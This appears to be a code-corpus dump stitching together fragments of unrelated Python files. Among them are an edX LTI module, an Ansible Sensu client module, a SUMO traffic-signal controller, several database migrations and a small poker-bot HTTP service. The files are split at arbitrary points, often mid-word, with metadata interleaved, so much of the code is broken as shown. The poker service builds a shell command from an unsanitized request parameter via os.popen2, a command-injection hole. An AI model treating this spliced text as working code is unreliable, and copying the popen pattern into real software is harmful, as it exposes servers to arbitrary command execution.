"""[channel] - unlocks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-i", "unlock", text, chan, conn, notice)
|
benschulz/servo
|
tests/wpt/mozilla/tests/mozilla/resources/no_mime_type.py
|
Python
|
mpl-2.0
| 443
| 0
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the M
|
PL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
def main(request, response):
headers = []
if 'Content-Type' in request.GET:
headers += [('Content-Type', request.GET['Content-Type'])]
with open('./resources/ahem/AHEM____.TTF') as f:
r
|
eturn 200, headers, f.read()
|
onnovalkering/sparql-over-sms
|
sos-service/src/persistence/models/message.py
|
Python
|
mit
| 1,021
| 0.000979
|
from persistence.models import Agent, BaseModel
from peewee import *
class Message(BaseModel):
"""description of class"""
correlationid = CharField()
category = IntegerField()
body = CharField(null=True)
sender = ForeignKeyField(
|
Agent, related_name='send_messages')
receiver = ForeignKeyField(Agent, related_name='received_messages')
# flags
complete = BooleanField(defaul
|
t=False)
processed = BooleanField(default=False)
# computed
def get_body(self):
if self.body is not None:
return self.body
if not self.complete:
return None
messageparts = sorted(self.parts, key=lambda x: x.position)
body = ''.join([part.body for part in messageparts])
return body
def as_dict(self):
return {
'id': self.correlationid,
'sender': self.sender.name,
'reciever': self.receiver.name,
'category': self.category,
'body': self.get_body()
}
|
jolyonb/edx-platform
|
common/lib/xmodule/xmodule/lti_module.py
|
Python
|
agpl-3.0
| 37,872
| 0.002905
|
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
Learning Tools Interoperability (LTI) module.
Resources
---------
Theoretical background and detailed specifications of LTI can be found on:
http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html
This module is based on the version 1.1.1 of the LTI specifications by the
IMS Global authority. For authentication, it uses OAuth1.
When responding back to the LTI tool provider, we must issue a correct
response. Types of responses and their message payload is available at:
Table A1.2 Interpretation of the 'CodeMajor/severity' matrix.
http://www.imsglobal.org/gws/gwsv1p0/imsgw
|
s_wsdlBindv1p0.html
A resource to test the LTI pr
|
otocol (PHP realization):
http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php
We have also begun to add support for LTI 1.2/2.0. We will keep this
docstring in synch with what support is available. The first LTI 2.0
feature to be supported is the REST API results service, see specification
at
http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html
What is supported:
------------------
1.) Display of simple LTI in iframe or a new window.
2.) Multiple LTI components on a single page.
3.) The use of multiple LTI providers per course.
4.) Use of advanced LTI component that provides back a grade.
A) LTI 1.1.1 XML endpoint
a.) The LTI provider sends back a grade to a specified URL.
b.) Currently only action "update" is supported. "Read", and "delete"
actions initially weren't required.
B) LTI 2.0 Result Service JSON REST endpoint
(http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html)
a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery
endpoint and receive URLs for interacting with individual grading units.
(see lms/djangoapps/courseware/views/views.py:get_course_lti_endpoints)
b.) GET, PUT and DELETE in LTI Result JSON binding
(http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html)
for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleteing
Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via
GET / PUT / DELETE HTTP methods respectively
"""
from __future__ import absolute_import
import base64
import datetime
import hashlib
import logging
import textwrap
from xml.sax.saxutils import escape
from pkg_resources import resource_string
import bleach
import mock
import oauthlib.oauth1
import six
import six.moves.urllib.parse
from lxml import etree
from oauthlib.oauth1.rfc5849 import signature
from pytz import UTC
from six import text_type
from webob import Response
from xblock.core import List, Scope, String, XBlock
from xblock.fields import Boolean, Float
from xmodule.editing_module import MetadataOnlyEditingDescriptor
from xmodule.lti_2_util import LTI20ModuleMixin, LTIError
from xmodule.raw_module import EmptyDataRawDescriptor
from xmodule.x_module import XModule, module_attr
log = logging.getLogger(__name__)
DOCS_ANCHOR_TAG_OPEN = (
"<a target='_blank' "
"href='https://edx.readthedocs.io/projects/edx-partner-course-staff/en/latest/exercises_tools/lti_component.html'>"
)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class LTIFields(object):
"""
Fields to define and obtain LTI tool from provider are set here,
except credentials, which should be set in course settings::
`lti_id` is id to connect tool with credentials in course settings. It should not contain :: (double semicolon)
`launch_url` is launch URL of tool.
`custom_parameters` are additional parameters to navigate to proper book and book page.
For example, for Vitalsource provider, `launch_url` should be
*https://bc-staging.vitalsource.com/books/book*,
and to get to proper book and book page, you should set custom parameters as::
vbid=put_book_id_here
book_location=page/put_page_number_here
Default non-empty URL for `launch_url` is needed due to oauthlib demand (URL scheme should be presented)::
https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
"""
display_name = String(
display_name=_("Display Name"),
help=_(
"The display name for this component. "
"Analytics reports may also use the display name to identify this component."
),
scope=Scope.settings,
default="LTI",
)
lti_id = String(
display_name=_("LTI ID"),
help=_(
"Enter the LTI ID for the external LTI provider. "
"This value must be the same LTI ID that you entered in the "
"LTI Passports setting on the Advanced Settings page."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='',
scope=Scope.settings
)
launch_url = String(
display_name=_("LTI URL"),
help=_(
"Enter the URL of the external tool that this component launches. "
"This setting is only used when Hide External Tool is set to False."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='http://www.example.com',
scope=Scope.settings)
custom_parameters = List(
display_name=_("Custom Parameters"),
help=_(
"Add the key/value pair for any custom parameters, such as the page your e-book should open to or "
"the background color for this component."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
scope=Scope.settings)
open_in_a_new_page = Boolean(
display_name=_("Open in New Page"),
help=_(
"Select True if you want students to click a link that opens the LTI tool in a new window. "
"Select False if you want the LTI content to open in an IFrame in the current page. "
"This setting is only used when Hide External Tool is set to False. "
),
default=True,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_(
"Select True if this component will receive a numerical score from the external LTI system."
),
default=False,
scope=Scope.settings
)
weight = Float(
display_name=_("Weight"),
help=_(
"Enter the number of points possible for this component. "
"The default value is 1.0. "
"This setting is only used when Scored is set to True."
),
default=1.0,
scope=Scope.settings,
values={"min": 0},
)
module_score = Float(
help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"),
default=None,
scope=Scope.user_state
)
score_comment = String(
help=_("Comment as returned from grader, LTI2.0 spec"),
default="",
scope=Scope.user_state
)
hide_launch = Boolean(
display_name=_("Hide External Tool"),
help=_(
"Select True if you want to use this component as a placeholder for syncing with an external grading "
"system rather than launch an external tool. "
"This setting hides the Launch button and any IFrames for this component."
|
rolandkakonyi/poker-player-objc
|
player_service.py
|
Python
|
mit
| 1,447
| 0.002073
|
import time
import cgi
import json
import os
import BaseHTTPServer
HOST_NAME = 'localhost'
PORT_NUMBER = 9400
class PlayerService(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
action = postvars['action'][0]
w, r = os.popen2("./obj/player " + action)
if 'game_state' in postvars:
game_state = postvars['game_state'][0]
|
w.write(game_
|
state)
w.close()
response = r.read()
self.wfile.write(response)
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), PlayerService)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
|
cbrafter/TRB18_GPSVA
|
codes/sumoAPI/HybridVAControl.py
|
Python
|
mit
| 15,253
| 0.005704
|
#!/usr/bin/env python
"""
@file HybridVAControl.py
@author Craig Rafter
@date 19/08/2016
class for fixed time signal control
"""
import signalControl, readJunctionData, traci
from math import atan2, degrees, hypot
import numpy as np
from collections import defaultdict
class HybridVAControl(signalControl.signalControl):
def __init__(self, junctionData, minGreenTime=10., maxGreenTime=60., scanRange=250, packetRate=0.2):
super(HybridVAControl, self).__init__()
self.junctionData = junctionData
self.firstCalled = traci.simulation.getCurrentTime()
self.lastCalled = self.firstCalled
self.lastStageIndex = 0
traci.trafficlights.setRedYellowGreenState(self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString)
self.packetRate = int(1000*packetRate)
self.transition = False
# self.CAMactive = False
# dict[vehID] = [position, heading, velocity, Tdetect]
self.newVehicleInfo = {}
self.oldVehicleInfo = {}
self.scanRange = scanRange
self.jcnPosition = np.array(traci.junction.getPosition(self.junctionData.id))
self.jcnCtrlRegion = self._getJncCtrlRegion()
# print(self.junctionData.id)
# print(self.jcnCtrlRegion)
self.controlledLanes = traci.trafficlights.getControlledLanes(self.junctionData.id)
# dict[laneID] = [heading, shape]
self.laneDetectio
|
nInfo = self._getIncomingLaneInfo()
self.stageTime = 0.0
self.minGreenTime = minGreenTime
self.maxGreenTime = maxGreenTime
self.secondsPerMeterTraffic = 0.45
self.nearVehicleCatchDistance = 25
self.extendTime = 1.0 # 5 m in 10 m/s (acceptable journey 1.3
|
33)
self.laneInductors = self._getLaneInductors()
self.TIME_MS = self.firstCalled
self.TIME_SEC = 0.001 * self.TIME_MS
'''def minmax(x, lower, upper):
return min(max(x, lower), upper)
'''
def process(self):
self.TIME_MS = traci.simulation.getCurrentTime()
self.TIME_SEC = 0.001 * self.TIME_MS
# Packets sent on this step
# packet delay + only get packets towards the end of the second
if (not self.TIME_MS % self.packetRate) and (not 50 < self.TIME_MS % 1000 < 650):
#self.CAMactive = True
self._getCAMinfo()
# else:
# self.CAMactive = False
# Update stage decisions
# If there's no ITS enabled vehicles present use VA ctrl
numCAVs = len(self.oldVehicleInfo)
isControlInterval = not self.TIME_MS % 1000
#if isControlInterval: print('CTRL')
if numCAVs < 1 and isControlInterval:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('A'+str(self.stageTime))
# If active and on the second, or transition then make stage descision
elif numCAVs >= 1 and isControlInterval:
oncomingVeh = self._getOncomingVehicles()
# If new stage get furthest from stop line whose velocity < 5% speed
# limit and determine queue length
if self.transition:
furthestVeh = self._getFurthestStationaryVehicle(oncomingVeh)
if furthestVeh[0] != '':
meteredTime = self.secondsPerMeterTraffic*furthestVeh[1]
self.stageTime = max(self.minGreenTime, meteredTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
# If we're in this state this should never happen but just in case
else:
self.stageTime = self.minGreenTime
#print('B'+str(self.stageTime))
# If currently staging then extend time if there are vehicles close
# to the stop line
else:
nearestVeh = self._getNearestVehicle(oncomingVeh)
# If a vehicle detected
if nearestVeh != '' and nearestVeh[1] <= self.nearVehicleCatchDistance:
if (self.oldVehicleInfo[nearestVeh[0]][2] != 1e6
and self.oldVehicleInfo[nearestVeh[0]][2] > 1.0/self.secondsPerMeterTraffic):
meteredTime = nearestVeh[1]/self.oldVehicleInfo[nearestVeh[0]][2]
else:
meteredTime = self.secondsPerMeterTraffic*nearestVeh[1]
elapsedTime = 0.001*(self.TIME_MS - self.lastCalled)
Tremaining = self.stageTime - elapsedTime
self.stageTime = elapsedTime + max(meteredTime, Tremaining)
#self.stageTime = max(self.stageTime, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('C'+str(self.stageTime))
# no detectable near vehicle try inductive loop info
elif nearestVeh == '' or nearestVeh[1] > self.nearVehicleCatchDistance:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('D'+str(self.stageTime))
else:
pass
# process stage as normal
else:
pass
# print(self.stageTime)
if isControlInterval:
self.transition = False
if self.transitionObject.active:
# If the transition object is active i.e. processing a transition
pass
# elif (self.TIME_MS - self.firstCalled) < (self.junctionData.offset*1000):
# # Process offset first
# pass
elif (self.TIME_MS - self.lastCalled) < self.stageTime*1000:
# Before the period of the next stage
pass
else:
# Not active, not in offset, stage not finished
if len(self.junctionData.stages) != (self.lastStageIndex)+1:
# Loop from final stage to first stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[self.lastStageIndex+1].controlString)
self.lastStageIndex += 1
else:
# Proceed to next stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[0].controlString)
self.lastStageIndex = 0
#print(self.stageTime)
self.lastCalled = self.TIME_MS
self.transition = True
self.stageTime = 0.0
super(HybridVAControl, self).process()
def _getHeading(self, currentLoc, prevLoc):
dy = currentLoc[1] - prevLoc[1]
dx = currentLoc[0] - prevLoc[0]
if currentLoc[1] == prevLoc[1] and currentLoc[0] == prevLoc[0]:
heading = -1
else:
if dy >= 0:
heading = degrees(atan2(dy, dx))
else:
heading = 360 + degrees(atan2(dy, dx))
# Map angle to make compatible with SUMO heading
if 0 <= heading <= 90:
heading = 90 - heading
elif 90 < heading < 360:
heading = 4
|
alfredoavanzosc/odoo-addons
|
partner_contact_birthdate_age/__openerp__.py
|
Python
|
agpl-3.0
| 640
| 0
|
# -*- coding: utf-8
|
-*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Partner Contact Birthdate Age",
'version': '8.0.1.1.0',
'license': "AGPL-3",
'author': "AvanzOSC",
'website': "http://www.avanzosc.es",
'contributors': [
"Ana Juaristi <anajuaristi@avanzosc.es>",
"Alfredo de la Fuente <alfredodelafuente@avanzosc.es",
],
"category": "Customer Relationship Management",
"depends": [
|
'partner_contact_birthdate',
],
"data": [
'views/res_partner_view.xml',
],
"installable": True,
}
|
jbenden/ansible
|
lib/ansible/modules/monitoring/sensu_client.py
|
Python
|
gpl-3.0
| 9,506
| 0.002525
|
#!/usr/bin/python
# (c) 2017, Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: sensu_client
author: "David Moreau Simard (@dmsimard)"
short_description: Manages Sensu client configuration
version_added: 2.4
description:
- Manages Sensu client configuration.
- 'For more information, refer to the Sensu documentation: U(https://sensuapp.org/docs/latest/reference/clients.html)'
options:
state:
description:
- Whether the client should be present or not
choices: [ 'present', 'absent' ]
required: False
default: present
name:
description:
- A unique name for the client. The name cannot contain special characters or spaces.
required: False
default: System hostname as determined by Ruby Socket.gethostname (provided by Sensu)
address:
description:
- An address to help identify and reach the client. This is only informational, usually an IP address or hostname.
required: False
default: Non-loopback IPv4 address as determined by Ruby Socket.ip_address_list (provided by Sensu)
subscriptions:
description:
- An array of client subscriptions, a list of roles and/or responsibilities assigned to the system (e.g. webserver).
- These subscriptions determine which monitoring checks are executed by the client, as check requests are sent to subscriptions.
- The subscriptions array items must be strings.
required: True
default: null
safe_mode:
description:
- If safe mode is enabled for the client. Safe mode requires local check definitions in order to accept a check request and execute the check.
choices: [ 'true', 'false' ]
required: False
default: false
redact:
description:
- Client definition attributes to redact (values) when logging and sending client keepalives.
required: False
default: null
socket:
description:
- The socket definition scope, used to configure the Sensu client socket.
required: False
default: null
keepalives:
description:
- If Sensu should monitor keepalives for this client.
choices: [ 'true', 'false' ]
required: False
default: true
keepalive:
description:
- The keepalive definition scope, used to configure Sensu client keepalives behavior (e.g. keepalive thresholds, etc).
required: False
default: null
registration:
description:
- The registration definition scope, used to configure Sensu registration event handlers.
required: False
default: null
deregister:
description:
- If a deregistration event should be created upon Sensu client process stop.
choices: [ 'true', 'false' ]
required: False
default: false
deregistration:
description:
- The deregistration definition scope, used to configure automated Sensu client de-registration.
required: False
default: null
ec2:
description:
- The ec2 definition scope, used to configure the Sensu Enterprise AWS EC2 integration (Sensu Enterprise users only).
required: False
default: null
chef:
description:
- The chef definition scope, used to configure the Sensu Enterprise Chef integration (Sensu Enterprise users only).
required: False
default: null
puppet:
description:
- The puppet definition scope, used to configure the Sensu Enterprise Puppet integration (Sensu Enterprise users only).
required: False
default: null
servicenow:
description:
- The servicenow definition scope, used to configure the Sensu Enterprise ServiceNow integration (Sensu Enterprise users only).
required: False
default: null
notes:
- Check mode is supported
requirements: [ ]
'''
EXAMPLES = '''
# Minimum possible configuration
- name: Configure Sensu client
sensu_client:
subscriptions:
- default
# With customization
- name: Configure Sensu client
sensu_client:
name: "{{ ansible_fqdn }}"
address: "{{ ansible_default_ipv4['address'] }}"
subscriptions:
- default
- webserver
redact:
- password
socket:
bind: 127.0.0.1
port: 3030
keepalive:
thresholds:
warning: 180
critical: 300
handlers:
- email
custom:
- broadcast: irc
occurrences: 3
register: client
notify:
- Restart sensu-client
- name: Secure Sensu client configuration file
file:
path: "{{ client['file'] }}"
owner: "sensu"
group: "sensu"
mode: "0600"
- name: Delete the Sensu client configuration
sensu_client:
state: "absent"
'''
RETURN = '''
config:
description: Effective client configuration, when state is present
returned: success
type: dict
sample: {'name': 'client', 'subscriptions': ['default']}
file:
description: Path to the client configuration file
returned: success
type: string
sample: "/etc/sensu/conf.d/client.json"
'''
import json
import os
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
state=dict(type='str', required=False, choices=['present', 'absent'], default='present'),
name=dict(type='str', required=False),
address=dict(type='str', req
|
uired=False),
subscriptions=dict(type='list', required=False),
safe_mode=dict(type='bool', required=False, default=False),
redact=dict(type='list', required=False),
socket=dict(type='dict', required=False),
keepalives=dict(type='bool', required=False, default=True),
keepalive=dict(type
|
='dict', required=False),
registration=dict(type='dict', required=False),
deregister=dict(type='bool', required=False),
deregistration=dict(type='dict', required=False),
ec2=dict(type='dict', required=False),
chef=dict(type='dict', required=False),
puppet=dict(type='dict', required=False),
servicenow=dict(type='dict', required=False)
),
required_if=[
['state', 'present', ['subscriptions']]
]
)
state = module.params['state']
path = "/etc/sensu/conf.d/client.json"
if state == 'absent':
if os.path.exists(path):
if module.check_mode:
msg = '{path} would have been deleted'.format(path=path)
module.exit_json(msg=msg, changed=True)
else:
try:
os.remove(path)
msg = '{path} deleted successfully'.format(path=path)
module.exit_json(msg=msg, changed=True)
except OSError as e:
msg = 'Exception when trying to delete {path}: {exception}'
module.fail_json(
msg=msg.format(path=path, exception=str(e)))
else:
# Idempotency: it's okay if the file doesn't exist
msg = '{path} already does not exist'.format(path=path)
module.exit_json(msg=msg)
# Build client configuration from module arguments
config = {'client': {}}
args = ['name', 'address', 'subscriptions', 'safe_mode', 'redact',
'socket', 'keepalives', 'keepalive', 'registration', 'deregister',
'deregistration', 'ec2', 'chef', 'puppet', 'servicenow']
for arg in args:
if arg in module.params and module.params[arg] is not None:
config['client'][arg] = module.params[arg]
# Load the current config, if there is one, so we can compare
current_config = None
try:
current_config = json.load(open(path, 'r'))
except (IOError, ValueError):
# File either doesn't exist or it's invalid JSON
pass
if current_config is not None and current_config == config:
# Config is the same, let's not change anythi
|
carabri/carabri
|
test_script/open_gallery.py
|
Python
|
apache-2.0
| 123
| 0
|
import subprocess
subprocess.call("""
adb -d shell am start -n co
|
m.android.gallery/com.android.ca
|
mera.GalleryPicker
""")
|
kylef/lithium
|
lithium/wiki/migrations/0001_initial.py
|
Python
|
bsd-2-clause
| 7,245
| 0.008144
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Page'
db.create_table('wiki_page', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['wiki.Page'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('permission', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('wiki', ['Page'])
# Adding model 'Revision'
db.create_table('wiki_revision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Page'])),
('text', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Text'], null=True, blank=True)),
('comment', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('author_ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True)),
))
db.send_create_signal('wiki', ['Revision'])
# Adding model 'Text'
db.create_table('wiki_text', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('wiki', ['Text'])
def backwards(self, orm):
# Deleting model 'Page'
db.delete_table('wiki_page')
# Deleting model 'Revision'
db.delete_table('wiki_revision')
# Deleting model 'Text'
db.delete_table('wiki_text')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.Ch
|
arField', [], {'max_length': '100'}),
|
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wiki.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['wiki.Page']"}),
'permission': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wiki.revision': {
'Meta': {'ordering': "('-pub_date',)", 'object_name': 'Revision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'author_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Page']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'text': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Text']", 'null': 'True', 'blank': 'True'})
},
'wiki.text': {
'Meta': {'object_name': 'Text'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['wiki']
|
noironetworks/neutron
|
neutron/db/migration/alembic_migrations/versions/liberty/expand/45f955889773_quota_usage.py
|
Python
|
apache-2.0
| 1,496
| 0
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing per
|
missions and limitations
# under the License.
#
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
"""quota_usage
Revision ID: 45f955889773
Revises: 8675309a5c4f
Create Date: 2015-04-17 08:09:37.611546
"""
# revision identifiers, used by Alembic.
revision = '45f955889773'
down_revision = '8675309a5c4f'
def upgrade():
op.create_table(
|
'quotausages',
sa.Column('tenant_id', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('resource', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('dirty', sa.Boolean(), nullable=False,
server_default=sql.false()),
sa.Column('in_use', sa.Integer(), nullable=False,
server_default='0'),
sa.Column('reserved', sa.Integer(), nullable=False,
server_default='0'))
|
kickstandproject/ripcord
|
ripcord/db/sqlalchemy/migrate_repo/versions/006_add_quota_support.py
|
Python
|
apache-2.0
| 2,465
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 PolyBeacon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import UniqueConstraint
from ripcord.openstack.common import log as logging
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table(
'quotas', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('created_at', DateTime),
Column('h
|
ard_limit', Integer),
Column('project_id', String(length=255)),
Column('resource', String(length=255), nullable=False),
Column('updated_at', DateTime),
UniqueConstraint(
'project_id', 'resource',
name='uniq_quotas0project_id0resource'),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
quota_class = Table(
'quota_classes', meta,
Column('id', Integer, primary_key=
|
True, autoincrement=True),
Column('class_name', String(length=255)),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('resource', String(length=255)),
Column('updated_at', DateTime),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
tables = [quota, quota_class]
for table in tables:
try:
table.create()
except Exception as e:
LOG.exception(e)
meta.drop_all(tables=tables)
raise
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table('quotas', meta, autoload=True)
quota_class = Table('quota_classes', meta, autoload=True)
tables = [quota, quota_class]
for table in tables:
table.drop()
|
SitiBanc/1061_NCTU_IOMDS
|
1018/Course Material/1018_2.py
|
Python
|
apache-2.0
| 2,416
| 0.003714
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
